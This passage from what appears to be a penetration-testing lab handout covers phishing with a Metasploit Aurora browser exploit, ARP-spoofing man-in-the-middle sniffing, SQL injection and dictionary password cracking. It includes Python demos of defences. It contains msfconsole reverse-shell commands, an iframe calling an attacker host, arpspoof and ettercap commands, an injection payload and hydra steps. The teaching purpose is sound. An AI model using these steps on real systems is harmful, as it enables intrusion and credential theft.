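    threading.Thread(target=srv.serve_forever, daemon=True).start()
    url = "http://127.0.0.1:%d/" % srv.server_address[1]
    challenge = None
    try:
        try:
            urlopen(Request(url), timeout=5)          # first visit: no credentials
        except HTTPError as err:
            challenge = err.headers.get("WWW-Authenticate")
        # The user types into the dialog; the browser resends with the header.
        token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
        urlopen(Request(url, headers={"Authorization": "Basic " + token}), timeout=5).read()
    finally:
        srv.shutdown()
        srv.server_close()
    return challenge, srv.captured


if __name__ == "__main__":
    chal, got = run_capture_demo("victim@example.com", "hunter2")   # constructed credentials
    print("challenge sent:", chal)
    for client, path, u, p in got:
        print("captured from %s on %s: user=%r password=%r" % (client, path, u, p))
```

Run it and you see the two-step exchange the lab relies on: the 401 with its realm (the text the user sees in the dialog) and then the clear-text credentials in the retry. The same decoder applied to a packet capture recovers passwords from any Basic-auth login sent over plain HTTP.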



The Phishing Attack (For Interest Only)



WARNING! Only try this for penetration testing on your VMs or on servers that you have permission to perform penetration testing!

You have created a mechanism to gain access to a vulnerable system by using the targeted system's web-browser. All the penetration tester needs to do is to set an elaborate "trap" that redirects the user to your host's IP_ADDRESS, disguised as a regular link.

Here is how simple (subtle) it can be:

  1. In msfconsole, set up a browser exploit that returns a reverse shell by entering the console commands:
    • use exploit/windows/browser/ms10_002_aurora
    • set PAYLOAD generic/shell_reverse_tcp
    • set LHOST (your attack host IP ADDRESS)
    • set URIPATH /
    • set LPORT 7371
    • set SRVPORT 80
    • exploit
  2. Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy, for example to obtain e-mail usernames and facebook accounts).
  3. Here is a link to sample HTML code: Template of e-mail attachment
  4. Edit the file to contain the following iframe (which silently loads your attack website when the page is opened):

     <iframe src="http://ATTACK_SERVER_IP_ADDRESS/" width="0" height="0" frameborder="0"></iframe>

  5. We could then send this HTML file via e-mail to the user (in this case masquerading as a facebook notification). You could simulate this attack for demonstration by creating the HTML file on your Windows server, and loading this file with a web-browser (like Internet Explorer).

    Another approach would be to send a "phony" notification with links to the facebook "login" page that carries the <iframe> element.

  6. Proceed to Task #2

Answer the Task #1 observations / questions in your lab log book.



Task #2: IP Spoofing (Man in the Middle) Attacks / Packet Sniffing


This section will demonstrate an ARP poisoning attack (the lab refers to it as "IP Spoofing") where the target host is "tricked" into sending its traffic to the attacker, because the attacker has convinced it that the attacker's MAC address belongs to the other host. The attacker can then forward ("feed") the packets to the real destination, keeping the session uninterrupted while reading information such as usernames and passwords from it.

INSTRUCTIONS:

  1. We will be using your Kali Linux host machine, Vulnerable Windows VM, and Vulnerable Linux VM for this section.
  2. Note the IP Address of your Windows server.
  3. Make certain that your Windows machine is running an FTP server. Set up the FTP server to only allow users to access the FTP server by username and password (this may not be required with the default installation and startup).
  4. For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: ping LINUX_IP_ADDR -t

    You should now see proof of a connection between your vulnerable Windows and Linux servers.
  5. Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.
  6. Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: ping WINDOWS_IP_ADDR
  7. We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.
  8. Switch to your Kali Linux (host) server, and open a shell terminal.
  9. While in the host (attack) machine, issue the following Linux command (it tells the Windows server that LINUX_IP_ADDR is at the attacker's MAC address):

    sudo arpspoof -t WINDOWS_IP_ADDR LINUX_IP_ADDR

  10. We need to continue the "man in the middle" attack by now performing the same manoeuvre for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following Linux command:

    sudo arpspoof -t LINUX_IP_ADDR WINDOWS_IP_ADDR

  11. Switch first to your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.

Connection Disconnected
When initially performing an ARP spoof, the connection between the machines is temporarily broken, because the attacker now receives the packets but does not pass them on. In order to re-establish the connection (via the "man in the middle") the attacker must enable IP FORWARDING.


  12. To complete the "man in the middle" attack, you are required to enable IP FORWARDING. Open another shell window in your host (attack) machine, and issue the following Linux commands in your attack host:

    sudo su           # login with admin password
    echo 1 > /proc/sys/net/ipv4/ip_forward

    (This sets IP FORWARDING to "True" or "On")

  13. Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.

Obtaining Username / Password Information
One of the main reasons for a "man in the middle" attack is to obtain sensitive information such as a username and password for further exploitation. A Packet Sniffer is a useful tool when performing a "man in the middle" attack. Throughout your journey in the area of Internet Security, you will soon learn that there is an abundance of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called dsniff.


  14. In an available shell terminal on your host (attack) server, issue the following Linux command: dsniff
    (tip: use the command which dsniff to confirm that the dsniff executable is installed and on your PATH; it must be run as root)
  15. This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.
  16. Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.

FTP Doesn't Work / Alternative ARP Poisoning Method

Students have noticed that when using Kali Linux as a host machine for the vulnerable Windows and Linux VMs they experience a problem when using the arpspoof command. You can use the ettercap command as an alternative: it does its own packet forwarding (so the IP FORWARDING step is not required) and it sniffs the captured traffic for credentials, doing the job of dsniff as well.

To run the ettercap command, issue the following command: ettercap -T -M arp /// /// -i vboxnet0

  17. Then switch back to your host (attack) server.
  18. What do you notice? Is this information sufficient to log on as a Windows system user? Record your findings in your lab log-book.
  19. Return to your vulnerable Linux server, and close the FTP connection with the Windows server.
  20. Switch back to your attack server. What information does dsniff provide?
  21. What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?
  22. Record your findings/answers in your lab log-book.
  23. Proceed to Task #3
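What arpspoof puts on the wire, and how a defender notices it, as an added example (not code from the lab or from the dsniff suite). It builds the raw Ethernet/ARP reply frame that poisons a victim's cache (the attacker's MAC paired with another host's IP), parses such frames back, and runs an arpwatch-style check over a constructed sequence of replies: an IP address claimed by two different MACs is the signature of the attack, and is one answer to the question about reducing the possibility of a "man in the middle" attack. The IP and MAC addresses are made up for the demo and are not the lab's.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed addresses for the demo (not the lab's); 08:00:27 is VirtualBox's OUI.
WINDOWS = ("192.168.56.101", "08:00:27:11:11:11")
LINUX = ("192.168.56.102", "08:00:27:22:22:22")
ATTACKER = ("192.168.56.1", "0a:00:27:00:00:00")


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply (42 bytes, no padding).

    A poisoning reply is one where sender_mac is the attacker's card but
    sender_ip is some other host's address: the victim's ARP cache takes the
    pair at face value, which is what `arpspoof -t victim host` sends."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)       # Ethernet/IPv4, reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)           # "this IP is at this MAC"
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode the ARP fields of an Ethernet frame; None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def detect_poisoning(frames):
    """arpwatch-style check over captured frames: an IP address advertised by more
    than one MAC is a poisoning indicator. Returns {ip: [macs...]} for conflicts."""
    claims = {}
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            continue
        claims.setdefault(arp["sender_ip"], set()).add(arp["sender_mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def sample_capture():
    """Constructed capture: two honest replies, then the two arpspoof frames from the lab."""
    return [
        build_arp_reply(LINUX[1], LINUX[0], WINDOWS[1], WINDOWS[0]),        # genuine
        build_arp_reply(WINDOWS[1], WINDOWS[0], LINUX[1], LINUX[0]),        # genuine
        build_arp_reply(ATTACKER[1], LINUX[0], WINDOWS[1], WINDOWS[0]),     # arpspoof -t WINDOWS LINUX
        build_arp_reply(ATTACKER[1], WINDOWS[0], LINUX[1], LINUX[0]),       # arpspoof -t LINUX WINDOWS
    ]


if __name__ == "__main__":
    for ip, macs in detect_poisoning(sample_capture()).items():
        print("ALERT: %s claimed by %s" % (ip, " and ".join(macs)))
```

Note what the check cannot do: it only sees the conflict because it remembers the earlier, genuine reply. A host that is poisoned before it has ever learned the real mapping shows no conflict, which is why static ARP entries for critical hosts and dynamic ARP inspection on the switch are the stronger controls.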

Answer Task #2 observations / questions in your lab log book.



Task #3: Database Injection Attack



SQL injection attacks take the form of introducing, or "injecting", malicious SQL via the input (form) fields that feed a SQL/MySQL database query, in order to gain access to the backend database. There are many different methods of injection attack. We will demonstrate a fairly common one, which exploits web applications that fail to sanitize user input before building a query for the MySQL server: the user inserts characters that have special meaning in SQL (such as the single quote ') into an established web-based database form, so that the input is interpreted as part of the query rather than as data.

In this section, we will only expose the student to the concept of an injection attack. You are NOT required to set up the MySQL server, or run a SQL injection attack on your vulnerable machines.

INSTRUCTIONS:

  1. Study the following PHP code below (the form field usr is placed straight into the query text; if the user submits anything' OR 'x'='x the WHERE clause becomes true for every row):
 <?php
	
	// value of the form field "usr", taken straight from the POST request
	$user = $_POST['usr'];
	
	// e.g. the attacker submits:  anything' OR 'x'='x
	// so the query that reaches MySQL is:
	//   SELECT user,password FROM users WHERE user = 'anything' OR 'x'='x'
	mysql_query("SELECT user,password FROM users WHERE user = '$user'");
	
	?>
	


  2. How could this code be incorporated with an HTML document (using a form) to perform a database injection attack? Record your answer in your lab log-book.
  3. View the associated YouTube video in the resources above, and try to briefly explain why this type of attack could work. Write your explanation in your lab log-book.
  4. Now, make the following editing change to your saved database form (the only change is on the line that reads the form field: the value is passed through an escaping function before it is used). Note that the mysql_* functions were removed in PHP 7; the preferred fix today is a prepared statement with bound parameters (mysqli or PDO), which keeps the user's value out of the SQL text altogether.
 <?php
	
	// mysql_real_escape_string() backslash-escapes the quote characters,
	// so the attacker's single quote can no longer close the string literal
	$user = mysql_real_escape_string($_POST['usr']);
	
	// the same input now reaches MySQL as:
	//   SELECT user,password FROM users WHERE user = 'anything\' OR \'x\'=\'x'
	// which simply matches no user
	mysql_query("SELECT user,password FROM users WHERE user = '$user'");
	
	?>
	
  5. Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.
  6. Proceed to Task #4.
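The same injection and both defences, run for real against an in-memory SQLite database so the effect of the payload can be observed, as an added example (this is not the lab's PHP and is not tied to MySQL). The users table and its rows are constructed for the demo. It goes slightly beyond the PHP above by also showing the parameterised query, which is the fix a practitioner would use: the database receives the query text and the user's value separately, so no escaping is needed. The escaping function doubles the single quote, which is SQLite's quoting rule, standing in for what mysql_real_escape_string does for MySQL.

```python
import sqlite3

# Constructed sample table standing in for the lab's "users" table.
SAMPLE_USERS = [("alice", "hash-a"), ("bob", "hash-b")]

# The payload from the lab, as typed into the "usr" form field.
PAYLOAD = "anything' OR 'x'='x"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


def lookup_vulnerable(db, user):
    """Mirrors the first PHP version: the value is pasted into the SQL text,
    so a quote in the value ends the literal and the rest is parsed as SQL."""
    sql = "SELECT user, password FROM users WHERE user = '" + user + "'"
    return db.execute(sql).fetchall()


def lookup_escaped(db, user):
    """Mirrors the mysql_real_escape_string() fix: quote characters are escaped
    before being pasted in (SQLite writes ' as '' where MySQL writes \\')."""
    sql = "SELECT user, password FROM users WHERE user = '" + user.replace("'", "''") + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user):
    """Preferred fix: the value never becomes part of the SQL text at all."""
    return db.execute("SELECT user, password FROM users WHERE user = ?", (user,)).fetchall()


def demo():
    db = make_db()
    return {
        "vulnerable": lookup_vulnerable(db, PAYLOAD),        # every row comes back
        "escaped": lookup_escaped(db, PAYLOAD),              # no such user
        "parameterized": lookup_parameterized(db, PAYLOAD),  # no such user
        "normal": lookup_parameterized(db, "alice"),         # legitimate lookup still works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-13s -> %s" % (name, rows))
```

The vulnerable lookup returns both rows for the payload because the query has become WHERE user = 'anything' OR 'x'='x'; the other two return nothing, because the whole string (quotes included) is compared as a username.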

Answer Task #3 observations / questions in your lab log book.



Task #4: Password Cracking Attack



In this section, you will learn another technique to crack passwords: obtaining usernames (for example from e-mail addresses), and then running a password cracking program in the hope of gaining access to an account with a weak password on a vulnerable Windows server. After gaining access to that account, a series of techniques can be used to try to gain access to the administrator's account.

INSTRUCTIONS:

  1. Go to your vulnerable Windows server, and create a username called weak that has a very weak password (no special characters, just words that could be contained in a dictionary).
  2. How could you obtain usernames (e.g. e-mail usernames) for a targeted computer system? (Review your labs and notes from the Reconnaissance Phase.) Record your answer in your lab log-book.
  3. Assume that you have obtained a username (i.e. username: weak) from the reconnaissance phase. We will now be using a tool to gain access to that account on the targeted Windows server.

Cain Password Dictionary
A password cracking program requires a dictionary of common passwords. The file cain.txt is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.


  4. We need to download a dictionary file containing many weak passwords to help crack the user's weak password. You can perform a web search in order to save this dictionary as a text file.

    Here is a link to various password cracking dictionaries: http://www.skullsecurity.org/wiki/index.php/Passwords

    As root, download the compressed file (cain.txt.bz2) to your /root directory.

  5. Decompress the file by issuing the following Linux command: bunzip2 cain.txt.bz2

xhydra
xhydra is the graphical frontend of THC Hydra, an online password-guessing program: it connects to a network service (here, FTP) and tries each password from a dictionary file against an account until one is accepted. Of course, you could perform this task manually by using nmap to find the open ports and then using other password cracking tools (such as Cain & Abel), but xhydra lets you configure and run the guessing from one window. Because every guess is a real login attempt against the live server, the attempts appear in its logs and can trigger an account lockout, which is one of the defences you are asked about below.



  6. To launch the xhydra application as root (unless you are already root), issue the following Linux command: sudo xhydra

  7. In the initial application window (i.e. the Target tab), enter the WINDOWS_IP_ADDR in the Target textbox.
  8. Under the Protocol list-box, select ftp.
  9. In the Output Options section, check Be verbose, and check Show Attempts.
  10. Move to the next screen by clicking on the Passwords tab.
  11. In the Username section, type the username weak.
  12. In the Password section, click on the Password List radio button, and then click on the password list text-box in order to browse to the /root/cain.txt dictionary (on your Kali Linux system) that contains the common passwords you downloaded and decompressed.
  13. At the bottom of the screen, check Try login as password, and check Try empty password.
  14. Click on the Start tab, and click on the Start button (at the bottom of the screen) to begin the attack.
  15. This attack may take several minutes to complete.
  16. Check the output from the password cracking attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.

Gaining Root Access
Once a penetration tester has access to a system as an unprivileged user, there are methods to try to identify and gain access to an administrative account.

For example, on Linux systems, an attacker can read the /etc/passwd file to list the users (including those with administrative privileges) and, if /etc/shadow can be read, attempt to crack the root password hash offline (via the John the Ripper utility). Unlike the online guessing performed by hydra, offline cracking makes no connection to the target, so it cannot be slowed down or locked out by the server.


  17. What sort of harm can be done to this organization if the root account has been hacked?
  18. What sort of password rules should be used to make it harder to penetrate this system?

Sharpening Your Skills (hackthissite.org)

If you are interested in practicing or "honing" your penetration skills, there is a site called http://www.hackthissite.org that allows students to play and practice their skills.

WARNING: You ARE NOT SAFE in leaving personal information on the site. The owner of this site has served jail-time for FRAUD. There is also the possibility that a member of the hacker community may be able to access your personal information and use it for their personal advantage (at your expense).

You have been warned!


  19. Record your findings in your lab log-book.
  20. Proceed to the "Completing the Lab".
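The two kinds of attack named in this task, as an added example (not the lab's code and not hydra or John the Ripper): an online dictionary attack that tries candidates in the order the xhydra options chosen above produce them (empty password, then the login name itself, then the dictionary) against a constructed stand-in for the FTP login, with an optional attempt limit modelling an account-lockout policy; and an offline crack of a shadow-style hash, which needs no connection to the target. The wordlist, the accounts and the "$demo$" hash format are constructed for the demo; real /etc/shadow entries use crypt formats such as $6$ (SHA-512 crypt), which John handles in the same salt-and-compare way.

```python
import hashlib
import hmac

# Constructed stand-in for /root/cain.txt (a handful of entries; the real file is far larger).
WORDLIST = ["123456", "password", "letmein", "welcome", "sunshine", "football"]

# Constructed "vulnerable FTP server": one account with a dictionary word, one without.
FTP_ACCOUNTS = {"weak": "sunshine", "administrator": "Tr0ub4dor&3"}


def ftp_login(user, password):
    """Stand-in for the FTP USER/PASS exchange: True means '230 Login successful'."""
    return FTP_ACCOUNTS.get(user) == password


def candidates(user, wordlist, try_empty=True, login_as_password=True):
    """Yield guesses in the order the lab's xhydra options produce them:
    the empty password, the login name itself, then the dictionary (no repeats)."""
    seen = set()
    extras = ([""] if try_empty else []) + ([user] if login_as_password else [])
    for guess in extras + list(wordlist):
        if guess not in seen:
            seen.add(guess)
            yield guess


def online_dictionary_attack(user, wordlist, login=ftp_login, max_attempts=None):
    """Online attack as hydra performs it: every guess is a real login attempt.
    Returns (password, attempts_used) or (None, attempts_used). max_attempts models
    an account-lockout policy on the server, which is what defeats this attack."""
    attempts = 0
    for guess in candidates(user, wordlist):
        if max_attempts is not None and attempts >= max_attempts:
            break
        attempts += 1
        if login(user, guess):
            return guess, attempts
    return None, attempts


def demo_hash(password, salt):
    """Constructed shadow-style entry "$demo$<salt>$<hex>". Real /etc/shadow uses crypt
    formats such as $6$ (SHA-512 crypt), but the attack below works the same way."""
    digest = hashlib.sha512((salt + password).encode("utf-8")).hexdigest()
    return "$demo$%s$%s" % (salt, digest)


def crack_hash(entry, wordlist):
    """Offline attack as John the Ripper performs it: re-hash each candidate with the
    salt stored in the entry and compare. No connection to the target, so no lockout."""
    _, scheme, salt, _digest = entry.split("$")
    if scheme != "demo":
        raise ValueError("unsupported hash format")
    for word in wordlist:
        if hmac.compare_digest(demo_hash(word, salt), entry):
            return word
    return None


if __name__ == "__main__":
    print("online, no lockout:   ", online_dictionary_attack("weak", WORDLIST))
    print("online, 5-try lockout:", online_dictionary_attack("weak", WORDLIST, max_attempts=5))
    print("offline crack:        ", crack_hash(demo_hash("letmein", "Xy9z"), WORDLIST))
```

With no lockout the weak account falls on the seventh guess; with a five-attempt lockout the same attack fails, which is the point of the password-policy question above. The offline cracker is indifferent to lockout, which is why the defence against it is a strong, slow hash and passwords that are not in any wordlist.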

Answer Task #4 observations / questions in your lab log book.


Completing the Lab

Arrange evidence for each of these items on your screen, then ask your instructor to review them and sign off on the lab's completion:

  1. Proof of Windows VM hack from Phishing / Malicious Code.
  2. Packet Sniffing information from Linux to Windows FTP connection.
  3. Demonstration of prevention from Data Injection Attack.
  4. Completed Lab 4 notes.


Preparing for Quizzes

  1. Briefly explain the purpose of a Phishing Attack. How can phishing relate to using malicious code?
  2. Define the term Man in the Middle attack.
  3. Briefly list the steps in a Database Injection attack.
  4. How can a dictionary file be used to crack passwords on a targeted server?
  5. What is a password hash? How can a password hash be cracked?
  6. What can an organization do to prevent passwords on their computer system from being cracked?